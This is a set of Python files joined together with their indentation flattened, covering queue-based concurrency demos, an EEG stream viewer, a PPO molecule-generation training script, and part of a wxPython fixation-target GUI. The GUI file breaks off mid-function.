from multiprocessing import Process, JoinableQueue
def custom(q):
while 1:
print("消费者消费{}".format(q.get()))
time.sleep(random.random())
q.task_done()
def produce(q):
for x in range(4):
time.sleep(random.random())
q.put(x)
print("生产者生产{}".format(x))
q.join()
if __name__ == "__main__":
q = JoinableQueue()
c = Process(target=custom, args=(q, ))
p = Process(target=produce, args=(q, ))
c.daemon = True
c.start()
p.start()
p.join()
|
threads_queue.py
|
import threading
import time
from random import randint
from queue import Queue
def get_url_list(url_queue):
# 爬取文章列表页的url:生产者
print("get_url_list begining")
while True:
for i in range(10):
url_queue.put("www.studyai.com/"+str(randint(1,2000))+"/")
time.sleep(2)
print("生产者又生产了10个url")
def get_html_detail(id,url_queue):
# 爬取url列表中的文章的详情页:消费者
print("#"+str(id)+" get_html_detail begining")
while True:
print("剩余url个数:", url_queue.qsize())
if not url_queue.empty():
# for url in url_list:
url = url_queue.get()
print("#"+str(id)+" 正在爬取详情页:"+url)
time.sleep(1)
else:
print("url 队列 为空啦~~")
# url_queue.task_done()
# break
if __name__ == "__main__":
start_time = time.time()
url_queue = Queue(maxsize=50)
list_thread = threading.Thread(target=get_url_list,args=(url_queue,))
list_thread.start()
# list_thread.join()
detail_threads=[]
for k in range(5):
detail_thread = threading.Thread(target=get_html_detail,args=(k,url_queue))
detail_threads.append(detail_thread)
detail_thread.start()
# detail_thread.join()
url_queue.join()
consumed_time = time.time() - start_time
print("time consumed: ", consumed_time)
|
lsl-viewer.py
|
#!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as plt
from scipy.signal import butter, lfilter, lfilter_zi, firwin
from time import sleep
from pylsl import StreamInlet, resolve_byprop
from optparse import OptionParser
import seaborn as sns
from threading import Thread
sns.set(style="whitegrid")
parser = OptionParser()
parser.add_option("-w", "--window",
dest="window", type='float', default=5.,
help="window lenght to display in seconds.")
parser.add_option("-s", "--scale",
dest="scale", type='float', default=100,
help="scale in uV")
parser.add_option("-r", "--refresh",
dest="refresh", type='float', default=0.2,
help="refresh rate in seconds.")
parser.add_option("-f", "--figure",
dest="figure", type='string', default="15x6",
help="window size.")
filt = True
subsample = 2
buf = 12
(options, args) = parser.parse_args()
window = options.window
scale = options.scale
figsize = np.int16(options.figure.split('x'))
print("looking for an EEG stream...")
streams = resolve_byprop('type', 'EEG', timeout=2)
if len(streams) == 0:
raise(RuntimeError("Cant find EEG stream"))
print("Start aquiring data")
class LSLViewer():
def __init__(self, stream, fig, axes, window, scale, dejitter=True):
"""Init"""
self.stream = stream
self.window = window
self.scale = scale
self.dejitter = dejitter
self.inlet = StreamInlet(stream, max_chunklen=buf)
self.filt = True
info = self.inlet.info()
description = info.desc()
self.sfreq = info.nominal_srate()
self.n_samples = int(self.sfreq * self.window)
self.n_chan = info.channel_count()
ch = description.child('channels').first_child()
ch_names = [ch.child_value('label')]
for i in range(self.n_chan):
ch = ch.next_sibling()
ch_names.append(ch.child_value('label'))
self.ch_names = ch_names
fig.canvas.mpl_connect('key_press_event', self.OnKeypress)
fig.canvas.mpl_connect('button_press_event', self.onclick)
self.fig = fig
self.axes = axes
sns.despine(left=True)
self.data = np.zeros((self.n_samples, self.n_chan))
self.times = np.arange(-self.window, 0, 1./self.sfreq)
impedances = np.std(self.data, axis=0)
lines = []
for ii in range(self.n_chan):
line, = axes.plot(self.times[::subsample],
self.data[::subsample, ii] - ii, lw=1)
lines.append(line)
self.lines = lines
axes.set_ylim(-self.n_chan + 0.5, 0.5)
ticks = np.arange(0, -self.n_chan, -1)
axes.set_xlabel('Time (s)')
axes.xaxis.grid(False)
axes.set_yticks(ticks)
ticks_labels = ['%s - %.1f' % (ch_names[ii], impedances[ii])
for ii in range(self.n_chan)]
axes.set_yticklabels(ticks_labels)
self.display_every = int(0.2 / (12/self.sfreq))
# self.bf, self.af = butter(4, np.array([1, 40])/(self.sfreq/2.),
# 'bandpass')
self.bf = firwin(32, np.array([1, 40])/(self.sfreq/2.), width=0.05,
pass_zero=False)
self.af = [1.0]
zi = lfilter_zi(self.bf, self.af)
self.filt_state = np.tile(zi, (self.n_chan, 1)).transpose()
self.data_f = np.zeros((self.n_samples, self.n_chan))
def update_plot(self):
k = 0
while self.started:
samples, timestamps = self.inlet.pull_chunk(timeout=1.0,
max_samples=12)
if timestamps:
if self.dejitter:
timestamps = np.float64(np.arange(len(timestamps)))
timestamps /= self.sfreq
timestamps += self.times[-1] + 1./self.sfreq
self.times = np.concatenate([self.times, timestamps])
self.n_samples = int(self.sfreq * self.window)
self.times = self.times[-self.n_samples:]
self.data = np.vstack([self.data, samples])
self.data = self.data[-self.n_samples:]
filt_samples, self.filt_state = lfilter(
self.bf, self.af,
samples,
axis=0, zi=self.filt_state)
self.data_f = np.vstack([self.data_f, filt_samples])
self.data_f = self.data_f[-self.n_samples:]
k += 1
if k == self.display_every:
if self.filt:
plot_data = self.data_f
elif not self.filt:
plot_data = self.data - self.data.mean(axis=0)
for ii in range(self.n_chan):
self.lines[ii].set_xdata(self.times[::subsample] -
self.times[-1])
self.lines[ii].set_ydata(plot_data[::subsample, ii] /
self.scale - ii)
impedances = np.std(plot_data, axis=0)
ticks_labels = ['%s - %.2f' % (self.ch_names[ii],
impedances[ii])
for ii in range(self.n_chan)]
self.axes.set_yticklabels(ticks_labels)
self.axes.set_xlim(-self.window, 0)
self.fig.canvas.draw()
k = 0
else:
sleep(0.2)
def onclick(self, event):
print((event.button, event.x, event.y, event.xdata, event.ydata))
def OnKeypress(self, event):
if event.key == '/':
self.scale *= 1.2
elif event.key == '*':
self.scale /= 1.2
elif event.key == '+':
self.window += 1
elif event.key == '-':
if self.window > 1:
self.window -= 1
elif event.key == 'd':
self.filt = not(self.filt)
def start(self):
self.started = True
self.thread = Thread(target=self.update_plot)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.started = False
fig, axes = plt.subplots(1, 1, figsize=figsize, sharex=True)
lslv = LSLViewer(streams[0], fig, axes, window, scale)
help_str = """
toggle filter : d
toogle full screen : f
zoom out : /
zoom in : *
increase time scale : -
decrease time scale : +
"""
print(help_str)
lslv.start()
plt.show()
lslv.stop()
|
ppo.py
|
import argparse
from copy import copy, deepcopy
from collections import defaultdict
from datetime import timedelta
import concurrent.futures
import gc
import gzip
import os
import os.path as osp
import pickle
import psutil
import pdb
import subprocess
import sys
import threading
import time
import traceback
import warnings
warnings.filterwarnings('ignore')
import numpy as np
import pandas as pd
from tqdm import tqdm
import torch
import torch.nn as nn
import torch.nn.functional as F
from torch_geometric.data import Data, Batch
import torch_geometric.nn as gnn
from mol_mdp_ext import MolMDPExtended, BlockMoleculeDataExtended
from gflownet import Dataset, make_model, Proxy
import model_atom, model_block, model_fingerprint
parser = argparse.ArgumentParser()
parser.add_argument("--learning_rate", default=2.5e-4, help="Learning rate", type=float)
parser.add_argument("--mbsize", default=16, help="Minibatch size", type=int)
parser.add_argument("--opt_beta", default=0.9, type=float)
parser.add_argument("--opt_beta2", default=0.99, type=float)
parser.add_argument("--nemb", default=256, help="#hidden", type=int)
parser.add_argument("--min_blocks", default=2, type=int)
parser.add_argument("--max_blocks", default=8, type=int)
parser.add_argument("--num_iterations", default=4000, type=int)
parser.add_argument("--num_conv_steps", default=6, type=int)
parser.add_argument("--log_reg_c", default=1e-2, type=float)
parser.add_argument("--reward_exp", default=4, type=float)
parser.add_argument("--reward_norm", default=10, type=float)
parser.add_argument("--sample_prob", default=1, type=float)
parser.add_argument("--clip_grad", default=0, type=float)
parser.add_argument("--clip_loss", default=0, type=float)
parser.add_argument("--replay_mode", default='online', type=str)
parser.add_argument("--bootstrap_tau", default=0, type=float)
parser.add_argument("--weight_decay", default=0, type=float)
parser.add_argument("--array", default='array_may_18')
parser.add_argument("--repr_type", default='block_graph')
parser.add_argument("--model_version", default='v4')
parser.add_argument("--run", default=0, help="run", type=int)
parser.add_argument("--include_nblocks", default=False)
parser.add_argument("--save_path", default='results/ppo/')
parser.add_argument("--proxy_path", default='data/pretrained_proxy/')
parser.add_argument("--print_array_length", default=False, action='store_true')
parser.add_argument("--progress", default='yes')
parser.add_argument("--floatX", default='float64')
parser.add_argument("--ppo_clip", default=0.2, type=float)
parser.add_argument("--ppo_entropy_coef", default=1e-4, type=float)
parser.add_argument("--ppo_num_samples_per_step", default=256, type=float)
parser.add_argument("--ppo_num_epochs_per_step", default=32, type=float)
class PPODataset(Dataset):
def __init__(self, args, bpath, device):
super().__init__(args, bpath, device)
self.current_dataset = []
def _get_sample_model(self):
m = BlockMoleculeDataExtended()
traj = []
for t in range(self.max_blocks):
s = self.mdp.mols2batch([self.mdp.mol2repr(m)])
with torch.no_grad():
s_o, m_o = self.sampling_model(s)
v = m_o[0, 1]
logits = torch.cat([m_o[0,0].reshape(1), s_o.reshape(-1)])
cat = torch.distributions.Categorical(
logits=logits)
action = cat.sample()
lp = cat.log_prob(action)
action = action.item()
if t >= self.min_blocks and action == 0:
r = self._get_reward(m)
traj.append([m, (-1, 0), r, BlockMoleculeDataExtended(), 1, lp, v])
break
else:
action = max(0, action-1)
action = (action % self.mdp.num_blocks, action // self.mdp.num_blocks)
m_new = self.mdp.add_block_to(m, *action)
if len(m_new.blocks) and not len(m_new.stems) or t == self.max_blocks - 1:
r = self._get_reward(m_new)
traj.append([m, action, r, m_new, 1, lp, v])
m = m_new
break
else:
traj.append([m, action, 0, m_new, 0, lp, v])
m = m_new
for i in range(len(traj)):
traj[i].append(r) # The return is the terminal reward
# the advantage, r + vsp * (1-done) - vs
traj[i].append(traj[i][2] + (traj[i+1][6] if i < len(traj)-2 else 0) - traj[i][6])
self.sampled_mols.append((r, m))
return traj
def sample2batch(self, mb):
s, a, r, sp, d, lp, v, G, A = mb
s = self.mdp.mols2batch([self.mdp.mol2repr(i) for i in s])
a = torch.tensor(a, device=self._device).long()
r = torch.tensor(r, device=self._device).to(self.floatX)
d = torch.tensor(d, device=self._device).to(self.floatX)
lp = torch.tensor(lp, device=self._device).to(self.floatX)
G = torch.tensor(G, device=self._device).to(self.floatX)
A = torch.tensor(A, device=self._device).to(self.floatX)
return s, a, r, d, lp, v, G, A
def r2r(self, dockscore=None, normscore=None):
if dockscore is not None:
normscore = 4-(min(0, dockscore)-self.target_norm[0])/self.target_norm[1]
normscore = max(self.R_min, normscore)
return (normscore/self.reward_norm) ** self.reward_exp
def start_samplers(self, n, mbsize):
self.ready_events = [threading.Event() for i in range(n)]
self.resume_events = [threading.Event() for i in range(n)]
self.results = [None] * n
def f(idx):
while not self.stop_event.is_set():
try:
self.results[idx] = self.sample2batch(self.sample(mbsize))
except Exception as e:
print("Exception while sampling:")
print(e)
self.sampler_threads[idx].failed = True
self.sampler_threads[idx].exception = e
self.ready_events[idx].set()
break
self.ready_events[idx].set()
self.resume_events[idx].clear()
self.resume_events[idx].wait()
self.sampler_threads = [threading.Thread(target=f, args=(i,)) for i in range(n)]
[setattr(i, 'failed', False) for i in self.sampler_threads]
[i.start() for i in self.sampler_threads]
round_robin_idx = [0]
def get():
while True:
idx = round_robin_idx[0]
round_robin_idx[0] = (round_robin_idx[0] + 1) % n
if self.ready_events[idx].is_set():
r = self.results[idx]
self.ready_events[idx].clear()
self.resume_events[idx].set()
return r
elif round_robin_idx[0] == 0:
time.sleep(0.001)
return get
def stop_samplers_and_join(self):
self.stop_event.set()
if hasattr(self, 'sampler_threads'):
while any([i.is_alive() for i in self.sampler_threads]):
[i.set() for i in self.resume_events]
[i.join(0.05) for i in self.sampler_threads]
_stop = [None]
def train_model_with_proxy(args, model, proxy, dataset, num_steps=None, do_save=True):
debug_no_threads = False
device = torch.device('cuda')
if num_steps is None:
num_steps = args.num_iterations + 1
tau = args.bootstrap_tau
if args.bootstrap_tau > 0:
target_model = deepcopy(model)
if do_save:
exp_dir = f'{args.save_path}/{args.array}_{args.run}/'
os.makedirs(exp_dir, exist_ok=True)
dataset.set_sampling_model(model, proxy, sample_prob=args.sample_prob)
def save_stuff():
pickle.dump([i.data.cpu().numpy() for i in model.parameters()],
gzip.open(f'{exp_dir}/params.pkl.gz', 'wb'))
pickle.dump(dataset.sampled_mols,
gzip.open(f'{exp_dir}/sampled_mols.pkl.gz', 'wb'))
pickle.dump({'train_losses': train_losses,
'test_losses': test_losses,
'test_infos': test_infos,
'time_start': time_start,
'time_now': time.time(),
'args': args,},
gzip.open(f'{exp_dir}/info.pkl.gz', 'wb'))
pickle.dump(train_infos,
gzip.open(f'{exp_dir}/train_info.pkl.gz', 'wb'))
opt = torch.optim.Adam(model.parameters(), args.learning_rate, weight_decay=args.weight_decay,
betas=(args.opt_beta, args.opt_beta2))
#opt = torch.optim.SGD(model.parameters(), args.learning_rate)
#tf = lambda x: torch.tensor(x, device=device).float()
tf = lambda x: torch.tensor(x, device=device).to(args.floatX)
tint = lambda x: torch.tensor(x, device=device).long()
mbsize = args.mbsize
ar = torch.arange(mbsize)
last_losses = []
def stop_everything():
print('joining')
dataset.stop_samplers_and_join()
_stop[0] = stop_everything
train_losses = []
test_losses = []
test_infos = []
train_infos = []
time_start = time.time()
time_last_check = time.time()
loginf = 1000 # to prevent nans
log_reg_c = args.log_reg_c
clip_loss = tf([args.clip_loss])
clip_param = args.ppo_clip
entropy_coef = args.ppo_entropy_coef
for i in range(num_steps):
samples = []
with concurrent.futures.ThreadPoolExecutor(max_workers=8) as executor:
futures = [executor.submit(dataset._get_sample_model)
for i in range(args.ppo_num_samples_per_step)]
for future in tqdm(concurrent.futures.as_completed(futures), leave=False):
samples += future.result()
for j in range(args.ppo_num_epochs_per_step):
idxs = dataset.train_rng.randint(0, len(samples), args.mbsize)
mb = [samples[i] for i in idxs]
s, a, r, d, lp, v, G, A = dataset.sample2batch(zip(*mb))
s_o, m_o = model(s)
new_logprob = -model.action_negloglikelihood(s, a, 0, s_o, m_o)
values = m_o[:, 1]
ratio = torch.exp(new_logprob - lp)
surr1 = ratio * A
surr2 = torch.clamp(ratio, 1.0 - clip_param,
1.0 + clip_param) * A
action_loss = -torch.min(surr1, surr2).mean()
value_loss = 0.5 * (G - values).pow(2).mean()
m_p, s_p = model.out_to_policy(s, s_o, m_o)
p = torch.zeros_like(m_p).index_add_(0, s.stems_batch, (s_p * torch.log(s_p)).sum(1))
p = p + m_p * torch.log(m_p)
entropy = -p.mean()
loss = action_loss + value_loss - entropy * entropy_coef
opt.zero_grad()
loss.backward()
if args.clip_grad > 0:
torch.nn.utils.clip_grad_value_(model.parameters(),
args.clip_grad)
opt.step()
last_losses.append((loss.item(), value_loss.item(), entropy.item()))
train_losses.append((loss.item(), value_loss.item(), entropy.item()))
if not i % 10:
last_losses = [np.round(np.mean(i), 3) for i in zip(*last_losses)]
print(i, last_losses, G.mean().item())
print('time:', time.time() - time_last_check)
time_last_check = time.time()
last_losses = []
if not i % 25 and do_save:
save_stuff()
stop_everything()
if do_save:
save_stuff()
return model
def main(args):
bpath = "data/blocks_PDB_105.json"
device = torch.device('cuda')
if args.floatX == 'float32':
args.floatX = torch.float
else:
args.floatX = torch.double
dataset = PPODataset(args, bpath, device)
print(args)
mdp = dataset.mdp
model = make_model(args, mdp, out_per_mol=2)
model.to(torch.double)
model.to(device)
proxy = Proxy(args, bpath, device)
train_model_with_proxy(args, model, proxy, dataset, do_save=True)
print('Done.')
def array_may_18(args):
base = {'nemb': 256,
}
all_hps = [
{**base,},
]
return all_hps
if __name__ == '__main__':
args = parser.parse_args()
if args.array:
all_hps = eval(args.array)(args)
if args.print_array_length:
print(len(all_hps))
else:
hps = all_hps[args.run]
print(hps)
for k,v in hps.items():
setattr(args, k, v)
main(args)
else:
try:
main(args)
except KeyboardInterrupt as e:
print("stopping for", e)
_stop[0]()
raise e
except Exception as e:
print("exception", e)
_stop[0]()
raise e
|
wxFixGUI.py
|
import asyncore
import os
import wx
import math
import wx.lib.agw.floatspin as FS
from time import sleep
from ViewPane import ViewPane
from protocolPane import ProtocolPane
from controlPanel import ControlPanel
from LightCrafter import wxLightCrafterFrame
from PreferencesDialog import PreferencesDialog
import socket
import threading
myEVT_MESSAGE = wx.NewEventType()
EVT_MESSAGE = wx.PyEventBinder(myEVT_MESSAGE, 1)
myEVT_RETURN_MESSAGE = wx.NewEventType()
EVT_RETURN_MESSAGE = wx.PyEventBinder(myEVT_RETURN_MESSAGE, 2)
# Sets Up The Class For The Program And Creates The Window
class wxFixationFrame(wx.Frame):
# The number of ppd of the screen we'll be projecting to (e.g. Lightcrafter, Projector, etc).
SCREEN_PPD = 20
# The increment steps we'll use.
MINOR_INCREMENT = 0.5
MAJOR_INCREMENT = 1
def __init__(self, parent=None, id=wx.ID_ANY):
wx.Frame.__init__(self, parent, id, 'Automated Fixation Graphical User Interface')
self.withSerial = False
# Initial Conditions
self.horz_loc = 0.0
self.vert_loc = 0.0
self.diopter_value = 0.0
self._eyesign = -1
self._locationfname = None
self._locationpath = None
self._locfileobj = None
self.ArduinoSerial = None
self.header_dir = ""
self.filename = ""
self.SaveLoc = True
# Allows Exit Button to Close Serial Communication
self.Bind(wx.EVT_CLOSE, self.on_quit)
# Allows For Arrow Keys And Keys In General
self.Bind(wx.EVT_CHAR_HOOK, self.on_keyboard_press)
self.initProtocolPanel(self)
self.initControlPanel(self)
self.initViewPane(self)
# Handles mouse motion, presses, and wheel motions
self.viewpane.Bind(wx.EVT_MOTION, self.on_mouse_motion)
self.viewpane.Bind(wx.EVT_LEFT_DOWN, self.on_left_mouse_button)
self.viewpane.Bind(wx.EVT_RIGHT_DOWN, self.on_right_mouse_button)
self.viewpane.Bind(wx.EVT_RIGHT_UP, self.on_right_mouse_button)
self.Bind(wx.EVT_MOUSEWHEEL, self.on_mouse_wheel)
# Bind to any changes in the rotation slider
self.control._iminitpane.BindTo(self.on_rotation_slider)
horzsizer = wx.BoxSizer(wx.HORIZONTAL)
horzsizer.Add(self.protocolpane, proportion=0, flag=wx.EXPAND)
horzsizer.Add(self.imagespace, proportion=0, flag=wx.EXPAND)
horzsizer.Add(self.control, proportion=0, flag=wx.EXPAND)
self.init_menubar()
# Displays Main Panel
self.SetSizerAndFit(horzsizer)
self.Layout()
self.Centre()
# Spawn the LightCrafter Canvas.
self.LCCanvas = wxLightCrafterFrame()
self.LCCanvas.Show()
self.prev_cursor = self.LCCanvas.get_fixation_cursor()
self.Bind(EVT_MESSAGE, self.handle_message)
# Spawn the pair of listener threads so we can detect changes in the comm Queues passed by Savior
self.fovListener = ConnListener(self) # This will recieve a tuple of sizes
self.fovListenerThread = threading.Thread(target=asyncore.loop, kwargs={'timeout': 1})
self.fovListenerThread.setDaemon(True)
self.fovListenerThread.start()
def initViewPane(self, parent):
# Setting up the ViewPane
self.imagespace = wx.Panel(parent, wx.ID_ANY)
self.imagespace.SetBackgroundColour('black')
self.viewpane = ViewPane(self.imagespace, size=(513, 513))
# Create left label
ltext = wx.Font(13, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False)
left_text = '\n\nN\na\ns\na\nl'
self.l_text = wx.StaticText(self.imagespace, wx.ID_ANY, left_text, style=wx.ALIGN_CENTER)
self.l_text.SetForegroundColour('white')
self.l_text.SetFont(ltext)
# Create top label
stext = wx.Font(13, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False)
superior = wx.StaticText(self.imagespace, wx.ID_ANY, 'Superior', style=wx.ALIGN_CENTER)
superior.SetForegroundColour('white')
superior.SetFont(stext)
# Create bottom label
stext = wx.Font(13, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False)
inferior = wx.StaticText(self.imagespace, wx.ID_ANY, 'Inferior', style=wx.ALIGN_CENTER)
inferior.SetForegroundColour('white')
inferior.SetFont(stext)
# Create right label
rtext = wx.Font(13, wx.FONTFAMILY_SWISS, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_BOLD, False)
right_text = 'T\ne\nm\np\no\nr\na\nl'
self.r_text = wx.StaticText(self.imagespace, wx.ID_ANY, right_text, style=wx.ALIGN_CENTER)
self.r_text.SetForegroundColour('white')
self.r_text.SetFont(rtext)
horzsizer = wx.BoxSizer(wx.HORIZONTAL)
vertsizer = wx.BoxSizer(wx.VERTICAL)
# Insert left label
horzsizer.Add(self.l_text, proportion=0, flag=wx.CENTER)
# The "center panel" is now a vertcontrol sizer- insert top, viewpane, and bottom pieces
vertsizer.Add(superior, proportion=0, flag=wx.CENTER)
vertsizer.Add(self.viewpane, 0, wx.ALIGN_CENTER | wx.ALL)
vertsizer.Add(inferior, proportion=0, flag=wx.CENTER)
# Insert the vertcontrol sizer
horzsizer.Add(vertsizer, 0, wx.ALIGN_CENTER | wx.ALL)
# Insert right label
horzsizer.Add(self.r_text, proportion=0, flag=wx.CENTER)
self.imagespace.SetSizer(horzsizer)
def initProtocolPanel(self, parent):
self.protocolpane = ProtocolPane(parent, id=wx.ID_ANY)
def initControlPanel(self, parent):
self.control = ControlPanel(parent, id=wx.ID_ANY)
# Bind all the events to the control panel
self.control.vertcontrol.Bind(FS.EVT_FLOATSPIN, self.on_vert_spin)
self.control.horzcontrol.Bind(FS.EVT_FLOATSPIN, self.on_horz_spin)
self.control.minorStep.Bind(FS.EVT_FLOATSPIN, self.on_minor_step)
self.control.majorStep.Bind(FS.EVT_FLOATSPIN, self.on_major_step)
self.control.OS.Bind(wx.EVT_RADIOBUTTON, self.on_eye_select)
self.control.OD.Bind(wx.EVT_RADIOBUTTON, self.on_eye_select)
self.control._iminitpane.selectim.Bind(wx.EVT_BUTTON, self.on_button_press)
self.control._iminitpane.initalign.Bind(wx.EVT_BUTTON, self.on_button_press)
# Menu Bar
def init_menubar(self):
# System Alignment Options
self.id_rec_ser = 10001
self.id_save_on = 10002
self.id_save_off = 10003
self.id_on_fill = 10011
self.id_off_fill = 10012
self.id_on_align = 10021
self.id_off_align = 10022
self.id_on_grid = 10031
self.id_off_grid = 10032
self.id_on_toggle = 10041
self.id_off_toggle = 10042
self.id_save_proto_loc = 10004
self.id_open_proto = 10005
self.id_clear_proto = 10006
# Creates Menu Bar
menubar = wx.MenuBar()
fileMenu = wx.Menu()
protoMenu = wx.Menu()
targetMenu = wx.Menu()
menubar.Append(fileMenu, 'File')
menubar.Append(protoMenu, 'Protocol')
menubar.Append(targetMenu, 'Target')
# Open a protocol
protoMenu.Append(self.id_save_proto_loc, 'Set Protocol Save Location...\t')
self.Bind(wx.EVT_MENU, self.on_set_save_protocol_location, id=self.id_save_proto_loc)
protoMenu.Append(self.id_open_proto, 'Open Protocol...\t')
self.Bind(wx.EVT_MENU, self.on_open_protocol_file, id=self.id_open_proto)
protoMenu.Append(self.id_clear_proto, 'Clear Protocol\t')
self.Bind(wx.EVT_MENU, self.on_clear_protocol, id=self.id_clear_proto)
# Open a background image
fileMenu.Append(wx.ID_OPEN, 'Open Background Image...\tCtrl+B')
self.Bind(wx.EVT_MENU, self.on_open_background_image, id=wx.ID_OPEN)
# self.Bind(wx.EVT_MENU,sel)
fileMenu.Append(wx.ID_SAVE, 'Save Fixation Image...\tCtrl+I')
self.Bind(wx.EVT_MENU, self.on_save_fixation_image, id=wx.ID_SAVE)
fileMenu.AppendSeparator()
fileMenu.Append(wx.ID_PREFERENCES, 'Preferences')
self.Bind(wx.EVT_MENU, self.on_preferences, id=wx.ID_PREFERENCES)
fileMenu.Append(wx.ID_EXIT, 'Exit\tCtrl+Q')
self.Bind(wx.EVT_MENU, self.on_quit, id=wx.ID_EXIT)
# Toggle on/off
self.toggleMenu = wx.Menu()
self.on_toggle = self.toggleMenu.AppendRadioItem(self.id_on_toggle, 'Yes')
self.Bind(wx.EVT_MENU, self.on_toggle_press, self.on_toggle)
self.off_toggle = self.toggleMenu.AppendRadioItem(self.id_off_toggle, 'No')
self.Bind(wx.EVT_MENU, self.on_toggle_press, self.off_toggle)
targetMenu.AppendSubMenu(self.toggleMenu,'Visible')
# Alignment
self.alignMenu = wx.Menu()
self.off_align = self.alignMenu.AppendRadioItem(self.id_off_align, 'Off')
self.Bind(wx.EVT_MENU, self.on_align_presss, self.off_align)
self.on_align = self.alignMenu.AppendRadioItem(self.id_on_align, 'On')
self.Bind(wx.EVT_MENU, self.on_align_presss, self.on_align)
targetMenu.AppendSubMenu(self.alignMenu, 'Alignment')
# Grid
self.gridMenu = wx.Menu()
self.off_grid = self.gridMenu.AppendRadioItem(self.id_off_grid, 'Off')
self.Bind(wx.EVT_MENU, self.on_grid_press, self.off_grid)
self.on_grid = self.gridMenu.AppendRadioItem(self.id_on_grid, 'On')
self.Bind(wx.EVT_MENU, self.on_grid_press, self.on_grid)
targetMenu.AppendSubMenu(self.gridMenu, 'Grid')
# Compounds the Menu Bar
self.SetMenuBar(menubar)
def get_minor_increment(self):
return self.MINOR_INCREMENT
def get_major_increment(self):
return self.MAJOR_INCREMENT
def get_vertical_fov(self):
return self.viewpane.get_v_fov()
def get_horizontal_fov(self):
return self.viewpane.get_h_fov()
def on_preferences(self, event):
prefs_dialog = PreferencesDialog(self,
major_increment=self.get_major_increment(),
minor_increment=self.get_minor_increment())
retcon = prefs_dialog.ShowModal()
if retcon == 1:
prefs = prefs_dialog.get_prefs()
self.set_major_increment(prefs['major_increment'])
self.set_minor_increment(prefs['minor_increment'])
def handle_message(self, evt):
switchboard = {
-1: self.on_quit,
0: self.mark_location,
1: self.set_FOV
}
if evt.get_datatype() in switchboard:
switchboard.get(evt.get_datatype())(evt.get_data())
# Toggle target on/off
def on_toggle_press(self, event):
if event.Id == self.id_on_toggle:
self.LCCanvas.show_fixation(True)
elif event.Id == self.id_off_toggle:
self.LCCanvas.show_fixation(False)
# Alignment
def on_align_presss(self, event):
pass
# Grid
def on_grid_press(self, event):
if event.Id == self.id_on_grid:
self.prev_cursor = self.LCCanvas.set_fixation_cursor(4)
print(str(self.prev_cursor))
elif event.Id == self.id_off_grid:
self.LCCanvas.set_fixation_cursor(self.prev_cursor)
# End of Menu Bar
def on_rotation_slider(self, rotation):
self.viewpane.SetBkgrdRotate(rotation)
def on_mouse_motion(self, event):
pos = event.GetPosition()
self.viewpane.set_mouse_loc(pos, self._eyesign)
if wx.MouseEvent.LeftIsDown(event):
# Convert to degrees
self.horz_loc, self.vert_loc = self.viewpane.to_degrees(pos)
self.update_fixation_location()
elif wx.MouseEvent.RightIsDown(event) and self.viewpane.get_state() == 1:
self.viewpane.set_bkgrd_pan(pos)
def on_left_mouse_button(self, event):
pos = event.GetPosition()
self.viewpane.set_mouse_loc(pos, self._eyesign)
# Convert to degrees
self.horz_loc, self.vert_loc = self.viewpane.to_degrees(pos)
self.update_fixation_location()
# To ensure we capture the initial offset from the origin of the image during a panning movement.
def on_right_mouse_button(self, event):
pos = event.GetPosition()
if event.RightDown():
self.viewpane.SetMouseOffset(wx.Point2DFromPoint(pos))
elif event.RightUp():
self.viewpane.SetMouseOffset(None)
def on_mouse_wheel(self, event):
if self.viewpane.get_state() is 1 or self.viewpane.get_state() is 2:
self.viewpane.SetBkgrdScale(math.copysign(1.0, event.GetWheelRotation()) * .01)
def on_button_press(self, evt):
button = evt.GetEventObject()
# If the user clicked on Select Image
if button is self.control._iminitpane.selectim:
self.on_open_background_image(None)
elif button is self.control._iminitpane.initalign:
state = self.viewpane.get_state() + 1
if state == 2:
self.viewpane.SetPanAnchor()
elif state == 3: # If they hit the button after the initialization, restart the process.
state = 0
# Update the states in the two panels
self.control.SetState(state)
self.viewpane.set_state(state)
else:
pass
def update_fixation_location(self, degrees=None):
# If you don't pass in degrees as an argument,
# then assume that we're using whatever the current degrees are.
if degrees is None:
degrees = wx.Point2D(self.horz_loc, self.vert_loc)
else:
self.horz_loc = degrees.x
self.vert_loc = degrees.y
# Update the respective GUIs
self.viewpane.set_fix_loc_in_deg(degrees)
self.control.vertcontrol.SetValue(degrees.y)
self.control.horzcontrol.SetValue(degrees.x)
x, y = self.degrees_to_screenpix(degrees.x, degrees.y)
self.LCCanvas.set_fixation_location(wx.Point2D(x, y))
def set_major_increment(self, increment):
self.MAJOR_INCREMENT = increment
def set_minor_increment(self, increment):
self.MINOR_INCREMENT = increment
def set_vertical_fov(self, degrees):
self.viewpane.set_v_fov(degrees)
def set_horizontal_fov(self, degrees):
self.viewpane.set_h_fov(degrees)
def on_save_fixation_image(self, evt=None):
dialog = wx.FileDialog(self, 'Save Fixation Display as:', "", "", 'PNG Image (*.png)|*.png', wx.FD_SAVE)
if dialog.ShowModal() == wx.ID_OK:
locationpath = dialog.GetDirectory()
locationfname = dialog.GetFilename()
dialog.Destroy()
self.viewpane.pane_to_file(locationpath + os.sep + locationfname)
def on_set_save_protocol_location(self, evt=None):
# If it doesn't exist, then prompt for the location before continuing...
dialog = wx.FileDialog(self, 'Save Location List As:', "", "", 'CSV (Comma delimited)|*.csv', wx.FD_SAVE)
if dialog.ShowModal() == wx.ID_OK:
self._locationpath = dialog.GetDirectory()
self._locationfname = dialog.GetFilename()
dialog.Destroy()
result = wx.ID_YES
if os.path.isfile(self._locationpath + os.sep + self._locationfname):
md = wx.MessageDialog(self, "Protocol file already exists! Overwrite?", "Protocol file already exists!",
wx.ICON_QUESTION | wx.YES_NO | wx.CANCEL)
result = md.ShowModal()
if result == wx.ID_YES:
self._locfileobj = open(self._locationpath + os.sep + self._locationfname, 'w') # Write the header
self._locfileobj.write("v0.1,Horizontal Location,Vertical Location,Horizontal FOV,Vertical FOV,Eye\n")
self._locfileobj.close()
def on_open_protocol_file(self, evt=None):
dialog = wx.FileDialog(self, 'Select protocol file:', self.header_dir, '',
'CSV files (*.csv)|*.csv', wx.FD_OPEN)
if dialog.ShowModal() == wx.ID_OK:
self.header_dir = dialog.GetDirectory()
protofname = dialog.GetFilename()
dialog.Destroy()
protopath = self.header_dir + os.sep + protofname
result = wx.ID_NO
